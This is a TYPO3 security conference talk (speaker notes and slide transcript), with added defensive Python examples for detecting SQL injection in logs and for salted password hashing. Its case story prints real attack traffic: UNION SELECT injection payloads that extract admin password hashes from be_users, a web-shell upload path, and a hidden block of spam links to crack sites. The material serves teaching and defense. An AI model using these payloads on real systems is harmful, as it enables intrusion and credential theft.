TYPO3 Security - Risks and Mitigation
 

Speaker Notes

  • Interrupt me immediately if you have questions
  • Web-Application Security, not personal nor governmental security. Nevertheless there are similarities, which I use to explain. Why is it important to define?
  • It depends ;)
  • Private things are kept private
    * Walking around the house naked
    * Customer data not exposed
    Nothing can be stolen
    * Your TV is still there when you return home and it is still working
    * Bank accounts, vouchers etc.
    Nobody can use your „subject“ for any other purpose than the one you intended
    * Nobody sleeps in your bed, uses your Internet connection for committing crime etc.
    * Website is running and does not display SPAM links
  • Caretaking:
    * Replace broken, non-working locks; don't use simple 3-number locks, not even for your oldest bike
    * As hackers, hacker tools and computing power evolve, so the security concepts have to
    * Established security handling workflow
    Your needs:
    * Do you live in a small village in Canada or in New York (special bike lock)?
    * Are you a bank or just showing your goldfish breed on a website?
    * The security efforts must relate to the possible impact:
    * resources invested in security / potential loss when hacked
    -> If the effort to be hacked exceeds the gain, your system is secure
    Nothing is secure by definition:
    * The security of an application must be proven over time
  • Caretaking:
    * All issues handled by the Security Team. No 0-day exploits so far, everything (core) has been reported beforehand to us
    * New security features are being implemented (saltedpasswords, rsaauth)
    Your needs:
    * TYPO3 is highly customizable (login services, plugins etc.)
    * e.g. health information platform: encrypted webservice data (password hash is key)
    Few critical security issues over time
    * Handled fast and reliably by the security team
  • Defense in Depth:
    * Onion principle
    * Fence, front door, curtains, bathroom/bedroom doors, password for your computer, safe
    * (Physical access,) firewall (network), OS, WAF, webserver Apache, PHP (suhosin), application (e.g. TYPO3)
    Minimize Exposure / Least privilege:
    * Activate only needed services (extensions) (OS, Apache, TYPO3) (turn off your Wifi when not at home)
    Obscurity:
    * Keys below the stone or above the door
    * e.g. alternate telnet port; database export in document root with „secret“ name
    Log:
    * Even helpful _after_ an incident
    * Cameras (laptop theft software)
    * Apache and TYPO3 logs (keep them in a safe place (not writable by the webserver/PHP user) if possible)
  • Automated tools:
    LizaMoon
    Obfuscate:
    Google conditional attack
    Gain:
    Even „small websites“ are targeted
  • Monitoring:
    * suspicious activity / load on server
    Up to date software:
    * OS, PHP, TYPO3, extensions
  • TYPO3 Core features:
    * much better maintained and better codebase
    Protected backend:
    * NO FTP!, SSL, protect with http auth (only certain IPs)
  • RD (Responsible Disclosure):
    * Publish issue with a fix (may take some time)
    Communication:
    * Everything you suspect to be security-related, let us know!
    Pre-Announcement:
    * If no pre-announcement is made, the issue is not critical
    * We try to release in the first half of the week (mostly Tuesday)
    Support:
    * Good reports
    * Send friendly reminders
    * Donate money

Presentation Transcript

  • TYPO3 Conference - San Francisco 2011: TYPO3 Security - Risks and Mitigation
  • T3CON11 San Francisco, TYPO3 Security - Risks and Mitigation, 10.06.2011, Helmut Hummel <helmut.hummel@typo3.org>
  • Introduction: About me
    * Involved in TYPO3 project since 2005
    * Member of the TYPO3 Security Team since 2008
    * TYPO3 Security Team Leader since 2009
    * TYPO3 Core Team Member since 2011
    * Employed at naw.info in Hannover, Germany
    * Twitter: helhum
    * Blog: http://www.naw.info/blogs/typo3security/
  • Agenda
    * What is Security?
    * General Security Concepts
    * Attack Vectors
    * Knowing the Enemy: A Case Story
    * Mitigation
    * TYPO3 Security Team
  • What is Security?
  • Is TYPO3 secure? Is my TYPO3 Site secure?
  • What is Security? Criteria for Security
    * Privacy
    * Integrity and Property
    * Availability and Intentional Use
  • Security is a process, not a product. (Bruce Schneier)
  • What is Security? Security is a process
    * Care taking and improvements over time
    * Depending on your needs
    * Nothing is secure! Something can only be not insecure at a particular time
  • What is Security? Why TYPO3 can be considered to be not insecure
    * TYPO3 Security Team takes care
    * Highly customizable for your needs
    * Few critical Security issues over time
  • General Security Concepts
  • General Security Concepts
    * Defense in depth
    * Minimize Exposure / Least privilege
    * Do not rely on security by obscurity
    * Log Activities
  • Attack Vectors
  • Attack Vectors
    * Security Issues in outdated TYPO3 Versions
    * Security Issues in (outdated) TYPO3 Extensions
    * Security Issues in TypoScript
    * Simple passwords
    * Compromised PC with FTP access
    * Other Software on the webserver
  • Knowing the Enemy
  • Knowing the Enemy: The incident, how did it happen?
    <div style="display:none;"><a href="http://totiyaso.tripod.com/jovian-v251-for-palmos- crack.html">Jovian v2.5.1 for PalmOS Crack</a> <a href="http://tarajoz.tripod.com/clickomania-21-for- palmos-crack.html">Clickomania 2.1 for PalmOS Crack</a> <a href="http://mujaciya.tripod.com/ ollydbg-110-xp-crack.html">OllyDbg 1.10 XP Crack</a> <a href="http://loyobusi.tripod.com/infograph- infocad-v651b-crack.html">InfoGraph InfoCAD v6.51b Crack</a> <a href="http://nisexufo.tripod.com/ customizer-xp-v15-by-tnt-crack.html">Customizer XP v1.5 by TNT Crack</a> <a href="http:// yajegoco.tripod.com/gw3dfeatures-for-solidworks-v5-crack.html">GW3Dfeatures For SolidWorks v5 Crack</ a> <a href="http://lebuvoxo.tripod.com/regrun-ii-v291-crack.html">RegRun II v2.91 Crack</a> <a href="http://ziziquy.tripod.com/stuffit-standard-v852165-crack.html">StuffIt Standard v8.5.2.165 Crack</a> <a href="http://ziziquy.tripod.com/glu3d-v1308-for-3dsmax-7-crack.html">Glu3D v1.3.08 for 3dsmax 7 Crack</a> <a href="http://yucayibu.tripod.com/cpukiller-v20-serial-by-tnt- crack.html">CPUKILLER v2.0 Serial by TNT Crack</a> <a href="http://fimegipo.tripod.com/microangelo- v55-by-aaocg-crack.html">Microangelo v5.5 by AAOCG Crack</a> <a href="http://loyobusi.tripod.com/ restoreit-deluxe-edition-v301-crack.html">RestoreIT!
    Deluxe Edition v3.01 Crack</a> <a href="http:// tomuxeq.tripod.com/abbyy-scanto-office-v10-crack.html">ABBYY ScanTo Office v1.0 Crack</a> <a href="http://besiluho.tripod.com/anno-domini-2002-v106-build-1-crack.html">Anno Domini 2002 v1.06 build 1 Crack</a> <a href="http://yepimal.tripod.com/serious-sam-2-plus-5-trainer-crack.html">SERIOUS SAM 2 PLUS 5 TRAINER Crack</a> <a href="http://vihuseya.tripod.com/pe-corrector-v166-by-fff- crack.html">PE Corrector v1.66 by FFF Crack</a> <a href="http://tarajoz.tripod.com/teenswebbrowser- bounce-10-crack.html">teensWebBrowser Bounce 1.0 Crack</a> <a href="http://loyobusi.tripod.com/bb- password-manager-v1011-crack.html">BB Password Manager v1.0.1.1 Crack</a> <a href="http:// reyabade.tripod.com/calendar-wizard-v2014a-crack.html">Calendar Wizard v2.0.14a Crack</a> <a href="http://gezuvak.tripod.com/1-act-personal-firewall-2006-crack.html">1-ACT Personal Firewall 2006 Crack</a> <a href="http://fimegipo.tripod.com/system-locker-112f-by-dbc-crack.html">System Locker 1.12f by DBC Crack</a> <a href="http://sehuxogo.tripod.com/nidesoft-dvd-ripper-v3062- crack.html">Nidesoft DVD Ripper v3.0.62 Crack</a> <a href="http://ziziquy.tripod.com/clonecd-v4331-by- tsrh-crack.html">CloneCD v4.3.3.1 by TSRH Crack</a> <a href="http://tihuqap.tripod.com/icon-sucker-2- pro-210072-crack.html">Icon Sucker 2 Pro 2.10.072 Crack</a> <a href="http://coqoxole.tripod.com/ primasoft-internet-optimizer-crack.html">PrimaSoft Internet Optimizer Crack</a> <a href="http:// fimegipo.tripod.com/fairstars-recorder-v201-crack.html">FairStars Recorder v2.01 Crack</a> <a href="http://nekuqoj.tripod.com/email-validation-for-net-v20crack.html">Email Validation for NET v2.0Crack</a> <a href="http://xocedeqi.tripod.com/mathworks-matlab-r2006b-3-cds-crack.html">Mathworks Matlab R2006b (3 cds) Crack</a> <a
  • Knowing the Enemy: Searching for vulnerabilities
    178.122.0.0 - - [17/Dec/2010:14:01:43 +0100] "GET http://www.example.com/glossary/?tx_a21glossary%5Buid%5D=93 HTTP/1.1" 200 54383 "-" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.6.30 Version/10.63"
  • Knowing the Enemy: Searching for vulnerabilities
    178.122.0.0 - - [17/Dec/2010:14:02:30 +0100] "GET http://www.example.com/glossary/?tx_a21glossary%5Buid%5D=93+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+--+ HTTP/1.1" 200 54383 "-" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.6.30 Version/10.63"
  • Knowing the Enemy: Searching for vulnerabilities
    14:03:09: tx_galleryexample_pi2[uid]=1192&tx_galleryexample_pi2[year]=2010
  • Knowing the Enemy: Searching for vulnerabilities
    14:03:21: tx_galleryexample_pi2[uid]=979&tx_galleryexample_pi2[year]=2010
  • Knowing the Enemy: Searching for vulnerabilities
    14:03:42: tx_galleryexample_pi2[uid]=979&tx_galleryexample_pi2[year]=2010
  • Knowing the Enemy: Searching for vulnerabilities
    14:04:15: tx_galleryexample_pi2[uid]=979&tx_galleryexample_pi2[year]=2010 --
  • Knowing the Enemy: Found something!
    14:04:38: tx_galleryexample_pi2[uid]=979&tx_galleryexample_pi2[year]=2010 order by 10 --
  • Knowing the Enemy: Forging the exploit
    14:08:38: tx_galleryexample_pi2[uid]=979&tx_galleryexample_pi2[year]=2010 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 --
  • Knowing the Enemy: Exploit working!
    14:09:04: tx_galleryexample_pi2[uid]=979&tx_galleryexample_pi2[year]=-2010 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,group_concat(concat_ws(0x3a3a,username,password,admin)),20,21,22 from be_users where admin=1 --
    Now the hacker has the md5 hashes of all admin passwords
  • Knowing the Enemy: 15 minutes later: Log in as admin!
    14:21:48: /typo3/index.php
    14:21:50: /typo3/backend.php
  • Knowing the Enemy: Uploading web shell
    14:22:32: /typo3conf/ext/t3quixplorer/mod1/index.php?action=upload&dir=/typo3conf/ext/realurlmanagement/
    14:22:46: /typo3conf/ext/realurlmanagement/title.php
    You lose!
  • Knowing the Enemy: Conclusion
    * Hackers know what they are doing
    * They know TYPO3 very well
    * They also use automated tools
    * They often try to obfuscate the hack
    * With automated attacks effort is low, gain is high
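The case story above is visible in the access log long before the web shell lands, which is the point of "Log Activities" and "Monitor your Website". The following is an added example, not part of the presentation: it parses Apache combined-format log lines, URL-decodes each query string so the matcher sees what the application saw, flags the probing indicators the slides show (UNION SELECT column enumeration, ORDER BY column counting, a trailing SQL comment, the be_users table name), and correlates per client IP whether the same address also reached the backend under /typo3/ or a PHP file below typo3conf/ext/. The sample log lines are constructed here, modelled on the slides (same anonymised address, UNION column list shortened, a benign visitor 192.0.2.10 added); the indicator list and path prefixes are assumptions to extend for your own site.

```python
import re
import urllib.parse
from collections import defaultdict

# Apache combined log format: ip ident user [time] "request" status size "referer" "agent".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Indicators of the probing the slides show (assumed list; extend as needed):
# UNION SELECT column enumeration, ORDER BY column counting, a trailing SQL
# comment that cuts off the rest of the query, and the be_users table name.
SQLI_PATTERNS = [
    ("union_select", re.compile(r"\bunion\b.*\bselect\b", re.I)),
    ("order_by", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("sql_comment", re.compile(r"(--|#|/\*)\s*$")),
    ("be_users", re.compile(r"\bbe_users\b", re.I)),
]

BACKEND_PREFIX = "/typo3/"       # TYPO3 backend entry points (assumed default location)
EXT_PREFIX = "/typo3conf/ext/"   # extension directory; the web shell in the case story was placed here

# Constructed sample, modelled on the slide's log lines; 192.0.2.10 is a constructed benign visitor.
SAMPLE_LOG = """\
178.122.0.0 - - [17/Dec/2010:14:01:43 +0100] "GET http://www.example.com/glossary/?tx_a21glossary%5Buid%5D=93 HTTP/1.1" 200 54383 "-" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.6.30 Version/10.63"
178.122.0.0 - - [17/Dec/2010:14:02:30 +0100] "GET http://www.example.com/glossary/?tx_a21glossary%5Buid%5D=93+union+select+1,2,3+--+ HTTP/1.1" 200 54383 "-" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.6.30 Version/10.63"
178.122.0.0 - - [17/Dec/2010:14:04:38 +0100] "GET /index.php?tx_galleryexample_pi2%5Buid%5D=979&tx_galleryexample_pi2%5Byear%5D=2010+order+by+10+-- HTTP/1.1" 200 12345 "-" "Opera/9.80"
178.122.0.0 - - [17/Dec/2010:14:21:48 +0100] "GET /typo3/index.php HTTP/1.1" 200 2048 "-" "Opera/9.80"
178.122.0.0 - - [17/Dec/2010:14:22:46 +0100] "GET /typo3conf/ext/realurlmanagement/title.php HTTP/1.1" 200 512 "-" "Opera/9.80"
192.0.2.10 - - [17/Dec/2010:14:05:00 +0100] "GET /glossary/?tx_a21glossary%5Buid%5D=42 HTTP/1.1" 200 40000 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Split one combined-format line into fields and decode its query string.
    Returns None for a line that does not match, so one corrupt line never aborts the run."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    parts = urllib.parse.urlsplit(rec["url"])  # accepts absolute and path-only request targets
    rec["path"] = parts.path
    # unquote_plus turns %5B into '[' and '+' into ' ', i.e. what the application received
    rec["query"] = urllib.parse.unquote_plus(parts.query)
    return rec


def sqli_indicators(query):
    """Names of the indicators that fire on a decoded query string, in SQLI_PATTERNS order."""
    return [name for name, pat in SQLI_PATTERNS if pat.search(query)]


def analyse(lines):
    """Aggregate per client IP: indicators seen, request count, and whether the address
    reached the backend or a PHP file below the extension directory."""
    findings = defaultdict(
        lambda: {"requests": 0, "indicators": set(), "backend": False, "ext_file": False}
    )
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        f = findings[rec["ip"]]
        f["requests"] += 1
        f["indicators"].update(sqli_indicators(rec["query"]))
        if rec["path"].startswith(BACKEND_PREFIX):
            f["backend"] = True
        if rec["path"].startswith(EXT_PREFIX) and rec["path"].endswith(".php"):
            f["ext_file"] = True
    return dict(findings)


def suspicious_ips(findings):
    """Addresses that probed for injection and also touched the backend or an
    extension PHP file: the combination seen in the case story, worth an immediate look."""
    return sorted(
        ip for ip, f in findings.items()
        if f["indicators"] and (f["backend"] or f["ext_file"])
    )


if __name__ == "__main__":
    result = analyse(SAMPLE_LOG.splitlines())
    for ip in suspicious_ips(result):
        f = result[ip]
        print(f"{ip}: {sorted(f['indicators'])} backend={f['backend']} ext_file={f['ext_file']}")
```

Run it against a real access log by replacing SAMPLE_LOG.splitlines() with the file's lines; because the matcher works on the decoded query, the percent-encoded and plus-encoded variants in the slides are caught alike. Decoding before matching matters: a rule that looks for the literal string "union select" in the raw log misses "union+select".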
  • Mitigation
  • Mitigation: Mandatory steps
    * Monitor and Back Up your Website
    * Read the announce Mailing list and bulletins carefully
    * Use up to date Software
    * Use saltedpasswords and advise your admins (and users) to use non obvious passwords
    * Make your Integrators aware of possible TypoScript problems
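Why "Use saltedpasswords" is on the mandatory list: in the case story the attacker logged in as admin fifteen minutes after reading the md5 hashes, because an unsalted md5 of a common password is a single table lookup away from the password. The following is an added illustration of the principle, not the saltedpasswords extension's own hash format: it contrasts plain md5 with a salted, iterated hash (PBKDF2-HMAC-SHA256 via hashlib, an assumed choice) stored in a self-describing string, and shows that two admins with the same password get different salted hashes that both still verify. The lookup table and iteration count are constructed for the example.

```python
import hashlib
import hmac
import os

# Assumed parameters for this illustration; not the saltedpasswords extension's scheme.
ALGO = "pbkdf2_sha256"
ITERATIONS = 100_000
SALT_BYTES = 16

# Constructed stand-in for the precomputed md5 tables that exist for common passwords.
COMMON_PASSWORDS = ["password", "admin", "123456", "typo3"]
MD5_TABLE = {hashlib.md5(p.encode()).hexdigest(): p for p in COMMON_PASSWORDS}


def unsalted_md5(password):
    """Plain md5 as stored without saltedpasswords: identical input, identical digest."""
    return hashlib.md5(password.encode()).hexdigest()


def crack_by_lookup(md5_hex):
    """Return the password if the digest is in the precomputed table, else None."""
    return MD5_TABLE.get(md5_hex)


def hash_password(password, salt=None):
    """Salted, iterated hash in an 'algo$iterations$salt$digest' string.
    A fresh random salt per password defeats precomputed tables; the iteration
    count makes each guess cost the attacker as much as it costs the server."""
    if salt is None:
        salt = os.urandom(SALT_BYTES)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"{ALGO}${ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    try:
        algo, iters, salt_hex, digest_hex = stored.split("$")
    except ValueError:
        return False
    if algo != ALGO:
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(digest.hex(), digest_hex)


def compare_storage(password):
    """Two admins choosing the same password: identical md5 digests (and a table hit)
    versus two different salted hashes that both verify."""
    md5_a, md5_b = unsalted_md5(password), unsalted_md5(password)
    salted_a, salted_b = hash_password(password), hash_password(password)
    return {
        "md5_identical": md5_a == md5_b,
        "md5_cracked": crack_by_lookup(md5_a),
        "salted_identical": salted_a == salted_b,
        "salted_both_verify": verify_password(password, salted_a) and verify_password(password, salted_b),
    }


if __name__ == "__main__":
    print(compare_storage("admin"))
```

The salt does not have to be secret; it only has to be unique per stored password, which is why it can sit in the same string as the digest. The second half of the slide's advice still applies: a salted hash of "admin" survives a table lookup but not a short dictionary run, so non-obvious passwords remain necessary.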
  • Mitigation: Advanced steps
    * Use TYPO3 Core features in favour of extensions
    * Use protected backend access
    * Consider using mod_security
    * Consider using the phpids TYPO3 Extension
  • TYPO3 Security Team
  • TYPO3 Security Team: Important things to know
    * Responsible Disclosure Policy
    * One communication channel (security@typo3.org)
    * Pre-Announcements for critical issues only
    * You can support us
  • Resources
    * PHP-Sicherheit (Christopher Kunz and Stefan Esser)
    * Essential PHP Security (Chris Shiflett)
    * http://www.owasp.org/
    * http://typo3.org/teams/security/security-bulletins/
    * http://typo3.org/teams/security/resources/
    * http://buzz.typo3.org/teams/security/
  • Questions?
  • Thank You!